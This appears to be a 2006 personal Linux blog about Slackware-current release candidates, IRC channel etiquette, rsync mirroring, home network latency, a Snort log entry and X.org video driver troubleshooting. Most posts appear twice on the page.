5. If anything happens in the channel that upsets you, take a deep breath and use your IRC client's ignore function to filter out the unwanted chatter. Don't take the matter into your own hands by insulting the offender, as you may become kicked or banned from the channel, regardless of your intentions. We recently had an incident where someone decided to attack someone based on the perception that the victim was overweight. The offender was asked to stop with a 'first and last warning' but continued 10 minutes later and was banned. Also, at this point, the victim had previously been passive to the attack, but became aggressive when the attacker ignored the operator's warning. After the attacker was banned, an onlooker decided to join the fray by insisting that the victim should also be banned because the victim defended himself by attacking also. The fact remains that the first attacker was banned because he directly ignored an operator's warning. The onlooker was also banned because he couldn't this issue, which was none of his business, die. Is all of this considered favoritism? In the above context, no, but if you're someone who is used to inciting anarchy, the rules/guidelines of ##slackware will never be enough. This is why every operator is empowered to handle things as they see fit, even when an abuser's tactics skirt the guidelines.
6. Lastly, if you bait an operator just for the sake of skirting guidelines, you're going to lose that battle. An intellectual debate is one thing, a targeted yet subtle attack is beyond the norm and will be dealt with.
I'll probably be posting the link to this entry to ##slackware so people can be aware of how assinine the drama in ##slackware has been lately.
A good example of some of the above activity can be found at this link:
http://wigglit.ath.cx/slackware_botlogs/slackware.log.27Aug2006
Use your browser's find function to find 'corto' and read from there until he gets his voice taken (around 4:22PM).
Slack-current now at RC3 status -- v11.0 release imminent !!
August 25th proved to be quite an active day for the -current changelog.
So, today, I've rsynced a mirror to my local mirror. FYI, I use the following when I rsync:
rsync --delete --progress --delete-excluded --exclude source/ --exclude zipslack/ -lpvrtz slackware.mirrors.tds.net::slackware/slackware-current /mnt/backup/ftp/pub/mirrors/slackware/
When I rsynced, I did it at 1:51PM and it finished at 1:57PM:
sent 381697 bytes received 545507254 bytes 1489465.08 bytes/sec
total size is 1890230078 speedup is 3.46
That's a pretty fast update in 6 minutes! Gotta love FiOS!
Anyways, when it is quiet today, I'll rsync my tower to RC3 then maybe do the same for my Toshiba (which is running v10.1, I think).
So, today, I've rsynced a mirror to my local mirror. FYI, I use the following when I rsync:
rsync --delete --progress --delete-excluded --exclude source/ --exclude zipslack/ -lpvrtz slackware.mirrors.tds.net::slackware/slackware-current /mnt/backup/ftp/pub/mirrors/slackware/
When I rsynced, I did it at 1:51PM and it finished at 1:57PM:
sent 381697 bytes received 545507254 bytes 1489465.08 bytes/sec
total size is 1890230078 speedup is 3.46
That's a pretty fast update in 6 minutes! Gotta love FiOS!
Anyways, when it is quiet today, I'll rsync my tower to RC3 then maybe do the same for my Toshiba (which is running v10.1, I think).
Friday, August 25, 2006
Slackware-current @ RC2 status ... Slack v11.0 should appear any day now!!
As you can see in the Slackware-current changelog, -current is at RC2 and has been for a few days.
I'm currently at RC1 on my main workstation...AND using the 2.6 kernel! As that machine uses SATA, I had a bit of a time getting my SATA drive to be seen. The box would boot (the main drive uses EIDE) but I couldn't reach out to my other drives installed in that machine. Well, all it took was to activate the proper module (I'll reference the driver later) to get SATA enabled again.
I've had no issues with RC1, but I'd like to upgrade my Toshiba to RC1 sometime this weekend, so see if there are any wireless issues. My Dell needs to be upgraded to RC1 also, but I hardly use the Linux partition on that laptop.
Other than that, Slackware is chugging along fine on my machines (and my public website at http://wigglit.ath.cx).
I'm currently at RC1 on my main workstation...AND using the 2.6 kernel! As that machine uses SATA, I had a bit of a time getting my SATA drive to be seen. The box would boot (the main drive uses EIDE) but I couldn't reach out to my other drives installed in that machine. Well, all it took was to activate the proper module (I'll reference the driver later) to get SATA enabled again.
I've had no issues with RC1, but I'd like to upgrade my Toshiba to RC1 sometime this weekend, so see if there are any wireless issues. My Dell needs to be upgraded to RC1 also, but I hardly use the Linux partition on that laptop.
Other than that, Slackware is chugging along fine on my machines (and my public website at http://wigglit.ath.cx).
Monday, August 07, 2006
UPDATE - http://www.unixfool.com/slack9isolist.shtml
I've semi-updated the mirrors list. This list documents which Slackware mirrors contain ISOs for download. The title of the page is misleading, as it was created when v9.0 was considered fresh. I've checked the links and every link that is working contains v10.2.
I'll go through http://www.slackware.com/getslack to see which mirrors were added since my previous update, then I'll update my pages to reflect the new mirrors.
[EDIT -
I've stopped editing http://www.unixfool.com/slack9isolist.shtml, as it appears that almost every mirror now contains .iso files for the latest versions of Slackware. When this page was initially constructed, many users complained that they couldn't find .iso files on the mirrors, which wasn't the case. I immediately went through all the mirrors published on http://www.slackware.com/getslack and found approximately 10 that offered .iso files.
I may remove that page, as it is currently useless.]
On a side note, I've recently had Verizon's FiOS installed in my home. All I can say is, IT FLIES! And, I can't get enough of the router itself, an Actiontec MI424WR wireless router that appears to be much much more than a SOHO router, as it has TONS of options and configurability. I'm going to be enjoying this router and hope to keep it once my 1-year contract has ended. The only thing my previous router (Linksys WRT54GX4) has that is better is better wireless range, and that's because its a MIMO (three antennas) router.
I'll keep you guys posted on the FiOS front.
Also, it appears that Slackware has been releasing a ton of bugfixes. Let me restate: it isn't a Slackware-related issue; the updates are related to software (MySQL, Apache...). There has also been a lot of activity in regards to regular -current updates. I'm hoping this means v11.0 is almost ready. I've ben rsync'ing like crazy lately, trying to keep current on -current (LOL).
OK, its late here. G'night!
I'll go through http://www.slackware.com/getslack to see which mirrors were added since my previous update, then I'll update my pages to reflect the new mirrors.
[EDIT -
I've stopped editing http://www.unixfool.com/slack9isolist.shtml, as it appears that almost every mirror now contains .iso files for the latest versions of Slackware. When this page was initially constructed, many users complained that they couldn't find .iso files on the mirrors, which wasn't the case. I immediately went through all the mirrors published on http://www.slackware.com/getslack and found approximately 10 that offered .iso files.
I may remove that page, as it is currently useless.]
On a side note, I've recently had Verizon's FiOS installed in my home. All I can say is, IT FLIES! And, I can't get enough of the router itself, an Actiontec MI424WR wireless router that appears to be much much more than a SOHO router, as it has TONS of options and configurability. I'm going to be enjoying this router and hope to keep it once my 1-year contract has ended. The only thing my previous router (Linksys WRT54GX4) has that is better is better wireless range, and that's because its a MIMO (three antennas) router.
I'll keep you guys posted on the FiOS front.
Also, it appears that Slackware has been releasing a ton of bugfixes. Let me restate: it isn't a Slackware-related issue; the updates are related to software (MySQL, Apache...). There has also been a lot of activity in regards to regular -current updates. I'm hoping this means v11.0 is almost ready. I've ben rsync'ing like crazy lately, trying to keep current on -current (LOL).
OK, its late here. G'night!
Wednesday, July 19, 2006
Patiently awaiting Slackware v11.0, Recent Snort Logs...
Yeah, I'm awaiting the release of Slackware v11.0. I should try to rsync my -current machines, which are on v10.1, I believe. That why I'll only have a short sync when v11.0 is released.
I also am scrubbing my logs on wigglit.ath.cx since I've been vacationing and had to attend a funeral in the last two weeks. I saw the below:
[**] [1:485:4] ICMP Destination Unreachable Communication Administratively Prohibited [**]
[Classification: Misc activity] [Priority: 3]
07/19-11:06:44.523876 0:B0:4A:6C:76:53 -> FE:FD:40:3E:E7:DC type:0x800 len:0x46
64.65.236.206 -> 66.160.141.30 ICMP TTL:246 TOS:0x0 ID:28020 IpLen:20 DgmLen:56
Type:3 Code:13 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED,
PACKET FILTERED
** ORIGINAL DATAGRAM DUMP:
66.160.141.30:43212 -> 64.65.236.206:113 TCP TTL:53 TOS:0x0 ID:15954 IpLen:20 DgmLen:56 DF
Seq: 0xB4CEF72C Ack: 0x10001
** END OF DUMP
I believe I've seen this before in my logs but I want to further investigate it to get a better understanding of what it means.
I've been neglecting my Slackware installs the last month, as I've recently purchased a white Mac Book (2.0 GHz). I'm currently trying to get used to the internal file structure and commands, as they sometimes differ from FreeBSD's typical commands. I've also started a blog documenting my Mac experiences ... see it at http://whitemacbook.blogger.com .
I also am scrubbing my logs on wigglit.ath.cx since I've been vacationing and had to attend a funeral in the last two weeks. I saw the below:
[**] [1:485:4] ICMP Destination Unreachable Communication Administratively Prohibited [**]
[Classification: Misc activity] [Priority: 3]
07/19-11:06:44.523876 0:B0:4A:6C:76:53 -> FE:FD:40:3E:E7:DC type:0x800 len:0x46
64.65.236.206 -> 66.160.141.30 ICMP TTL:246 TOS:0x0 ID:28020 IpLen:20 DgmLen:56
Type:3 Code:13 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED,
PACKET FILTERED
** ORIGINAL DATAGRAM DUMP:
66.160.141.30:43212 -> 64.65.236.206:113 TCP TTL:53 TOS:0x0 ID:15954 IpLen:20 DgmLen:56 DF
Seq: 0xB4CEF72C Ack: 0x10001
** END OF DUMP
I believe I've seen this before in my logs but I want to further investigate it to get a better understanding of what it means.
I've been neglecting my Slackware installs the last month, as I've recently purchased a white Mac Book (2.0 GHz). I'm currently trying to get used to the internal file structure and commands, as they sometimes differ from FreeBSD's typical commands. I've also started a blog documenting my Mac experiences ... see it at http://whitemacbook.blogger.com .
Wednesday, June 28, 2006
Been Busy...again
Hi,
Yeah, I've been busy. Work-related stuff, really, although Summer is upon us and I also have to deal with the kids and relatives visiting (and visiting relatives). I haven't had much time to slack around with Slackware, although I did purchase a Mac Book 7 days ago.
I'll be attempting to build a dedicated box that firewalls and routes traffic. For some reason, I get a lot of latency with my current setup. I've a Netgear FVS114 FW/VPN SOHO set-top box as my router/switch and a Linksys WRT54GX4 that I use as a WAP. The Linksys is on its own subnet since I wanted to experiment with securing my WAP in the best manner. I love the Netgear's capabilities (it appears more capable than the Linksys in doing what I want to do...I've already ran into issues where I think I was asking the Linksys to do things it wasn't designed to do). I plan to configure a VPN tunnel between the Netgear and a friend's gateway, to build my VPN skills. What I don't like is the fact that the Netgear appears to lag under load:
ron@delly$ ping 10.150.1.1
PING 10.150.1.1 (10.150.1.1): 56 data bytes
64 bytes from 10.150.1.1: icmp_seq=0 ttl=64 time=1.790 ms
64 bytes from 10.150.1.1: icmp_seq=1 ttl=64 time=1.147 ms
64 bytes from 10.150.1.1: icmp_seq=2 ttl=64 time=1.138 ms
64 bytes from 10.150.1.1: icmp_seq=3 ttl=64 time=1.501 ms
64 bytes from 10.150.1.1: icmp_seq=4 ttl=64 time=1.136 ms
64 bytes from 10.150.1.1: icmp_seq=5 ttl=64 time=1.144 ms
64 bytes from 10.150.1.1: icmp_seq=6 ttl=64 time=1.185 ms
64 bytes from 10.150.1.1: icmp_seq=7 ttl=64 time=1.153 ms
I'm not seeing any packets being dropped, but look at the times! I don't remember them being like that before, although my niece (or rather my wife's niece) does do some heavy downloading, I think.
Anyways, here's the WAP's ping results:
ronald-sinclairs-computer:~ rsinclair$ ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1): 56 data bytes
64 bytes from 192.168.1.1: icmp_seq=0 ttl=64 time=2.571 ms
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=2.246 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=2.392 ms
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=2.253 ms
64 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=1.728 ms
64 bytes from 192.168.1.1: icmp_seq=5 ttl=64 time=1.924 ms
64 bytes from 192.168.1.1: icmp_seq=6 ttl=64 time=1.680 ms
c64 bytes from 192.168.1.1: icmp_seq=7 ttl=64 time=2.368 ms
64 bytes from 192.168.1.1: icmp_seq=8 ttl=64 time=2.792 ms
NASTY! Again, there is no apparent packet loss, but look at the times.
At work, when I'm shelled into home, I can barely work, as I have to wait for keystrokes to register and also will ocassionally lose my SSH connection. I will check my Snort output and logs to make sure I'm not being hammered by someone.
Yeah, I've been busy. Work-related stuff, really, although Summer is upon us and I also have to deal with the kids and relatives visiting (and visiting relatives). I haven't had much time to slack around with Slackware, although I did purchase a Mac Book 7 days ago.
I'll be attempting to build a dedicated box that firewalls and routes traffic. For some reason, I get a lot of latency with my current setup. I've a Netgear FVS114 FW/VPN SOHO set-top box as my router/switch and a Linksys WRT54GX4 that I use as a WAP. The Linksys is on its own subnet since I wanted to experiment with securing my WAP in the best manner. I love the Netgear's capabilities (it appears more capable than the Linksys in doing what I want to do...I've already ran into issues where I think I was asking the Linksys to do things it wasn't designed to do). I plan to configure a VPN tunnel between the Netgear and a friend's gateway, to build my VPN skills. What I don't like is the fact that the Netgear appears to lag under load:
ron@delly$ ping 10.150.1.1
PING 10.150.1.1 (10.150.1.1): 56 data bytes
64 bytes from 10.150.1.1: icmp_seq=0 ttl=64 time=1.790 ms
64 bytes from 10.150.1.1: icmp_seq=1 ttl=64 time=1.147 ms
64 bytes from 10.150.1.1: icmp_seq=2 ttl=64 time=1.138 ms
64 bytes from 10.150.1.1: icmp_seq=3 ttl=64 time=1.501 ms
64 bytes from 10.150.1.1: icmp_seq=4 ttl=64 time=1.136 ms
64 bytes from 10.150.1.1: icmp_seq=5 ttl=64 time=1.144 ms
64 bytes from 10.150.1.1: icmp_seq=6 ttl=64 time=1.185 ms
64 bytes from 10.150.1.1: icmp_seq=7 ttl=64 time=1.153 ms
I'm not seeing any packets being dropped, but look at the times! I don't remember them being like that before, although my niece (or rather my wife's niece) does do some heavy downloading, I think.
Anyways, here's the WAP's ping results:
ronald-sinclairs-computer:~ rsinclair$ ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1): 56 data bytes
64 bytes from 192.168.1.1: icmp_seq=0 ttl=64 time=2.571 ms
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=2.246 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=2.392 ms
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=2.253 ms
64 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=1.728 ms
64 bytes from 192.168.1.1: icmp_seq=5 ttl=64 time=1.924 ms
64 bytes from 192.168.1.1: icmp_seq=6 ttl=64 time=1.680 ms
c64 bytes from 192.168.1.1: icmp_seq=7 ttl=64 time=2.368 ms
64 bytes from 192.168.1.1: icmp_seq=8 ttl=64 time=2.792 ms
NASTY! Again, there is no apparent packet loss, but look at the times.
At work, when I'm shelled into home, I can barely work, as I have to wait for keystrokes to register and also will ocassionally lose my SSH connection. I will check my Snort output and logs to make sure I'm not being hammered by someone.
Monday, June 05, 2006
Trident Video Drivers?
I'm currently using one of my two laptops (Toshiba Satellite 1805-S274), trying to get X.org drivers working with this laptop. I think I've the driver working with X.org:
bash-3.00$ sudo cat /var/log/Xorg.0.log | grep trident
(II) LoadModule: "trident"
(II) Loading /usr/X11R6/lib/modules/drivers/trident_drv.o
(II) Module trident: vendor="X.Org Foundation"
bash-3.00$
So, it appears that the driver is loaded, yet:
bash-3.00$ glxgears
324 frames in 7.0 seconds = 46.286 FPS
291 frames in 7.0 seconds = 41.571 FPS
140 frames in 5.0 seconds = 28.000 FPS
280 frames in 8.0 seconds = 35.000 FPS
140 frames in 5.0 seconds = 28.000 FPS
bash-3.00$
Those FPS aren't all that hot. Running 'glxinfo', I get the following:
bash-3.00$ glxinfo
name of display: :0.0
display: :0 screen: 0
direct rendering: No
server glx vendor string: SGI
server glx version string: 1.2
server glx extensions:
GLX_ARB_multisample, GLX_EXT_visual_info, GLX_EXT_visual_rating,
GLX_EXT_import_context, GLX_OML_swap_method, GLX_SGI_make_current_read,
GLX_SGIS_multisample, GLX_SGIX_fbconfig
client glx vendor string: SGI
client glx version string: 1.4
client glx extensions:
GLX_ARB_get_proc_address, GLX_ARB_multisample, GLX_EXT_import_context,
GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_MESA_allocate_memory,
GLX_MESA_swap_control, GLX_MESA_swap_frame_usage, GLX_OML_swap_method,
GLX_OML_sync_control, GLX_SGI_make_current_read, GLX_SGI_swap_control,
GLX_SGI_video_sync, GLX_SGIS_multisample, GLX_SGIX_fbconfig,
GLX_SGIX_pbuffer, GLX_SGIX_visual_select_group
GLX extensions:
GLX_ARB_get_proc_address, GLX_ARB_multisample, GLX_EXT_import_context,
GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_OML_swap_method,
GLX_SGI_make_current_read, GLX_SGIS_multisample, GLX_SGIX_fbconfig
OpenGL vendor string: Mesa project: www.mesa3d.org
OpenGL renderer string: Mesa GLX Indirect
OpenGL version string: 1.2 (1.5 Mesa 6.2.1)
OpenGL extensions:
GL_ARB_depth_texture, GL_ARB_imaging, GL_ARB_multitexture,
GL_ARB_point_parameters, GL_ARB_point_sprite, GL_ARB_shadow,
GL_ARB_shadow_ambient, GL_ARB_texture_border_clamp,
GL_ARB_texture_cube_map, GL_ARB_texture_env_add,
GL_ARB_texture_env_combine, GL_ARB_texture_env_crossbar,
GL_ARB_texture_env_dot3, GL_ARB_texture_mirrored_repeat,
GL_ARB_transpose_matrix, GL_ARB_window_pos, GL_EXT_abgr, GL_EXT_bgra,
GL_EXT_blend_color, GL_EXT_blend_func_separate, GL_EXT_blend_logic_op,
GL_EXT_blend_minmax, GL_EXT_blend_subtract, GL_EXT_clip_volume_hint,
GL_EXT_copy_texture, GL_EXT_draw_range_elements, GL_EXT_fog_coord,
GL_EXT_multi_draw_arrays, GL_EXT_packed_pixels, GL_EXT_point_parameters,
GL_EXT_polygon_offset, GL_EXT_rescale_normal, GL_EXT_secondary_color,
GL_EXT_separate_specular_color, GL_EXT_shadow_funcs,
GL_EXT_stencil_two_side, GL_EXT_stencil_wrap, GL_EXT_subtexture,
GL_EXT_texture, GL_EXT_texture3D, GL_EXT_texture_edge_clamp,
GL_EXT_texture_env_add, GL_EXT_texture_env_combine,
GL_EXT_texture_env_dot3, GL_EXT_texture_lod_bias, GL_EXT_texture_object,
GL_EXT_texture_rectangle, GL_EXT_vertex_array, GL_APPLE_packed_pixels,
GL_ATI_texture_env_combine3, GL_ATI_texture_mirror_once,
GL_ATIX_texture_env_combine3, GL_IBM_texture_mirrored_repeat,
GL_INGR_blend_func_separate, GL_MESA_pack_invert, GL_MESA_ycbcr_texture,
GL_NV_blend_square, GL_NV_point_sprite, GL_NV_texgen_reflection,
GL_NV_texture_rectangle, GL_SGIS_generate_mipmap,
GL_SGIS_texture_border_clamp, GL_SGIS_texture_edge_clamp,
GL_SGIS_texture_lod, GL_SGIX_depth_texture, GL_SGIX_shadow,
GL_SGIX_shadow_ambient, GL_SUN_multi_draw_arrays
glu version: 1.3
glu extensions:
GLU_EXT_nurbs_tessellator, GLU_EXT_object_space_tess
visual x bf lv rg d st colorbuffer ax dp st accumbuffer ms cav
id dep cl sp sz l ci b ro r g b a bf th cl r g b a ns b eat
----------------------------------------------------------------------
0x23 24 tc 0 24 0 r y . 8 8 8 0 0 16 0 0 0 0 0 0 0 None
0x24 24 tc 0 24 0 r y . 8 8 8 0 0 16 8 16 16 16 0 0 0 None
0x25 24 tc 0 32 0 r y . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x26 24 tc 0 32 0 r . . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x27 24 dc 0 24 0 r y . 8 8 8 0 0 16 0 0 0 0 0 0 0 None
0x28 24 dc 0 24 0 r y . 8 8 8 0 0 16 8 16 16 16 0 0 0 None
0x29 24 dc 0 32 0 r y . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x2a 24 dc 0 32 0 r . . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
bash-3.00$
It's more gibberish than anything, to me. I'll figure this out. Actually, maybe I should be hacking my more recent Dell instead.
On the laptop note, I'm seriously thinking on getting the Macintosh MacBook (13"), white edition. While the black looks nice, the pricetag reflects a $200 difference than the white one, with very little hardware difference. Maybe this X-mas?!
bash-3.00$ sudo cat /var/log/Xorg.0.log | grep trident
(II) LoadModule: "trident"
(II) Loading /usr/X11R6/lib/modules/drivers/trident_drv.o
(II) Module trident: vendor="X.Org Foundation"
bash-3.00$
So, it appears that the driver is loaded, yet:
bash-3.00$ glxgears
324 frames in 7.0 seconds = 46.286 FPS
291 frames in 7.0 seconds = 41.571 FPS
140 frames in 5.0 seconds = 28.000 FPS
280 frames in 8.0 seconds = 35.000 FPS
140 frames in 5.0 seconds = 28.000 FPS
bash-3.00$
Those FPS aren't all that hot. Running 'glxinfo', I get the following:
bash-3.00$ glxinfo
name of display: :0.0
display: :0 screen: 0
direct rendering: No
server glx vendor string: SGI
server glx version string: 1.2
server glx extensions:
GLX_ARB_multisample, GLX_EXT_visual_info, GLX_EXT_visual_rating,
GLX_EXT_import_context, GLX_OML_swap_method, GLX_SGI_make_current_read,
GLX_SGIS_multisample, GLX_SGIX_fbconfig
client glx vendor string: SGI
client glx version string: 1.4
client glx extensions:
GLX_ARB_get_proc_address, GLX_ARB_multisample, GLX_EXT_import_context,
GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_MESA_allocate_memory,
GLX_MESA_swap_control, GLX_MESA_swap_frame_usage, GLX_OML_swap_method,
GLX_OML_sync_control, GLX_SGI_make_current_read, GLX_SGI_swap_control,
GLX_SGI_video_sync, GLX_SGIS_multisample, GLX_SGIX_fbconfig,
GLX_SGIX_pbuffer, GLX_SGIX_visual_select_group
GLX extensions:
GLX_ARB_get_proc_address, GLX_ARB_multisample, GLX_EXT_import_context,
GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_OML_swap_method,
GLX_SGI_make_current_read, GLX_SGIS_multisample, GLX_SGIX_fbconfig
OpenGL vendor string: Mesa project: www.mesa3d.org
OpenGL renderer string: Mesa GLX Indirect
OpenGL version string: 1.2 (1.5 Mesa 6.2.1)
OpenGL extensions:
GL_ARB_depth_texture, GL_ARB_imaging, GL_ARB_multitexture,
GL_ARB_point_parameters, GL_ARB_point_sprite, GL_ARB_shadow,
GL_ARB_shadow_ambient, GL_ARB_texture_border_clamp,
GL_ARB_texture_cube_map, GL_ARB_texture_env_add,
GL_ARB_texture_env_combine, GL_ARB_texture_env_crossbar,
GL_ARB_texture_env_dot3, GL_ARB_texture_mirrored_repeat,
GL_ARB_transpose_matrix, GL_ARB_window_pos, GL_EXT_abgr, GL_EXT_bgra,
GL_EXT_blend_color, GL_EXT_blend_func_separate, GL_EXT_blend_logic_op,
GL_EXT_blend_minmax, GL_EXT_blend_subtract, GL_EXT_clip_volume_hint,
GL_EXT_copy_texture, GL_EXT_draw_range_elements, GL_EXT_fog_coord,
GL_EXT_multi_draw_arrays, GL_EXT_packed_pixels, GL_EXT_point_parameters,
GL_EXT_polygon_offset, GL_EXT_rescale_normal, GL_EXT_secondary_color,
GL_EXT_separate_specular_color, GL_EXT_shadow_funcs,
GL_EXT_stencil_two_side, GL_EXT_stencil_wrap, GL_EXT_subtexture,
GL_EXT_texture, GL_EXT_texture3D, GL_EXT_texture_edge_clamp,
GL_EXT_texture_env_add, GL_EXT_texture_env_combine,
GL_EXT_texture_env_dot3, GL_EXT_texture_lod_bias, GL_EXT_texture_object,
GL_EXT_texture_rectangle, GL_EXT_vertex_array, GL_APPLE_packed_pixels,
GL_ATI_texture_env_combine3, GL_ATI_texture_mirror_once,
GL_ATIX_texture_env_combine3, GL_IBM_texture_mirrored_repeat,
GL_INGR_blend_func_separate, GL_MESA_pack_invert, GL_MESA_ycbcr_texture,
GL_NV_blend_square, GL_NV_point_sprite, GL_NV_texgen_reflection,
GL_NV_texture_rectangle, GL_SGIS_generate_mipmap,
GL_SGIS_texture_border_clamp, GL_SGIS_texture_edge_clamp,
GL_SGIS_texture_lod, GL_SGIX_depth_texture, GL_SGIX_shadow,
GL_SGIX_shadow_ambient, GL_SUN_multi_draw_arrays
glu version: 1.3
glu extensions:
GLU_EXT_nurbs_tessellator, GLU_EXT_object_space_tess
visual x bf lv rg d st colorbuffer ax dp st accumbuffer ms cav
id dep cl sp sz l ci b ro r g b a bf th cl r g b a ns b eat
----------------------------------------------------------------------
0x23 24 tc 0 24 0 r y . 8 8 8 0 0 16 0 0 0 0 0 0 0 None
0x24 24 tc 0 24 0 r y . 8 8 8 0 0 16 8 16 16 16 0 0 0 None
0x25 24 tc 0 32 0 r y . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x26 24 tc 0 32 0 r . . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x27 24 dc 0 24 0 r y . 8 8 8 0 0 16 0 0 0 0 0 0 0 None
0x28 24 dc 0 24 0 r y . 8 8 8 0 0 16 8 16 16 16 0 0 0 None
0x29 24 dc 0 32 0 r y . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x2a 24 dc 0 32 0 r . . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
bash-3.00$
It's more gibberish than anything, to me. I'll figure this out. Actually, maybe I should be hacking my more recent Dell instead.
On the laptop note, I'm seriously thinking on getting the Macintosh MacBook (13"), white edition. While the black looks nice, the pricetag reflects a $200 difference than the white one, with very little hardware difference. Maybe this X-mas?!
Thursday, May 18, 2006
Talk about time lapse!
I plugged in my Toshiba that happens to be running Slackware-current. It's been off awhile and I noticed that the time was an hour or so behind, so I ran the below:
root@toshi:~# ntpdate ntp.nasa.gov
Looking for host ntp.nasa.gov and service ntp
host found : ntp-nasa.arc.nasa.gov
18 May 19:23:05 ntpdate[2185]: step time server 198.123.30.132 offset 4042.874524 sec
root@toshi:~# ntpdate ntp.nasa.gov
Looking for host ntp.nasa.gov and service ntp
host found : ntp-nasa.arc.nasa.gov
18 May 19:23:09 ntpdate[2188]: adjust time server 198.123.30.132 offset -0.000203 sec
I know this thing has a CMOS battery. Why the hell did it lose that much time??
I also got a Dell Precision 220 from work yesterday. They were going to throw it out. It's a decent system, but a coworker stripped the RAM before I got ahold of it. Unfortunately, it requires RAMBUS RAM. I'm looking now on eBay for some cheap RAMBUS RAM. The machine is dual proc capable but has one 667MHz Pentium III CPU. It is all IDE instead of SCSI like my Precision 410, but that's OK. It's internal layout is nice for a flat case. It has 2xUSB ports in the back. It has 5 PCI slots, so I can add a USB 2.0 PCI card when I get the chance. It has an integrated NIC (10/100) and came with a V770 PCI vidcard. It also has a Zip Drive. It has space for two hard disks and a CD drive. I have spare hard disks (all SCSI though). I may add SATA technology to it, though. I also grabbed a 17" CRT monitor that was about to be trashed also, and a bunch of CAT5 (that was golden, as CAT5 is expensive). I only need to decide what OS/distro I'm going to put on it...maybe NetBSD, as I already have a FreeBSD and an OpenBSD box). I also need to decide what duties this box will perform. The box has some life left, as it will take a gig of RAM and the CPU is upgradable to 1GHz.
I now need a big rack, as my systems are starting to pile up and my computer room looks horrendous!
A Dell rep or contractor will be showing up at my home tomorrow to repair my Inspiron 8500's monitor. Tomorrow is the last day of its service contract. I may renew it, as that laptop is my powerhouse machine, the most high-end system I have. My self-built tower probably has more raw horsepower (it's my gaming machine) but the Inspiron is troublefree and does indeed have a serious power at 2GHz. I usually watch my TiVo'd movies on it, crunch data on it when I boot into Slackware (it's a dual boot machine), or watch DVDs.
I'm still eyeing a Mac laptop or maybe even a Mac mini. Funds are the issue. We shall see what the near future holds for me. ;)
root@toshi:~# ntpdate ntp.nasa.gov
Looking for host ntp.nasa.gov and service ntp
host found : ntp-nasa.arc.nasa.gov
18 May 19:23:05 ntpdate[2185]: step time server 198.123.30.132 offset 4042.874524 sec
root@toshi:~# ntpdate ntp.nasa.gov
Looking for host ntp.nasa.gov and service ntp
host found : ntp-nasa.arc.nasa.gov
18 May 19:23:09 ntpdate[2188]: adjust time server 198.123.30.132 offset -0.000203 sec
I know this thing has a CMOS battery. Why the hell did it lose that much time??
I also got a Dell Precision 220 from work yesterday. They were going to throw it out. It's a decent system, but a coworker stripped the RAM before I got ahold of it. Unfortunately, it requires RAMBUS RAM. I'm looking now on eBay for some cheap RAMBUS RAM. The machine is dual proc capable but has one 667MHz Pentium III CPU. It is all IDE instead of SCSI like my Precision 410, but that's OK. It's internal layout is nice for a flat case. It has 2xUSB ports in the back. It has 5 PCI slots, so I can add a USB 2.0 PCI card when I get the chance. It has an integrated NIC (10/100) and came with a V770 PCI vidcard. It also has a Zip Drive. It has space for two hard disks and a CD drive. I have spare hard disks (all SCSI though). I may add SATA technology to it, though. I also grabbed a 17" CRT monitor that was about to be trashed also, and a bunch of CAT5 (that was golden, as CAT5 is expensive). I only need to decide what OS/distro I'm going to put on it...maybe NetBSD, as I already have a FreeBSD and an OpenBSD box). I also need to decide what duties this box will perform. The box has some life left, as it will take a gig of RAM and the CPU is upgradable to 1GHz.
I now need a big rack, as my systems are starting to pile up and my computer room looks horrendous!
A Dell rep or contractor will be showing up at my home tomorrow to repair my Inspiron 8500's monitor. Tomorrow is the last day of its service contract. I may renew it, as that laptop is my powerhouse machine, the most high-end system I have. My self-built tower probably has more raw horsepower (it's my gaming machine) but the Inspiron is troublefree and does indeed have a serious power at 2GHz. I usually watch my TiVo'd movies on it, crunch data on it when I boot into Slackware (it's a dual boot machine), or watch DVDs.
I'm still eyeing a Mac laptop or maybe even a Mac mini. Funds are the issue. We shall see what the near future holds for me. ;)
Subscribe to:
Posts (Atom)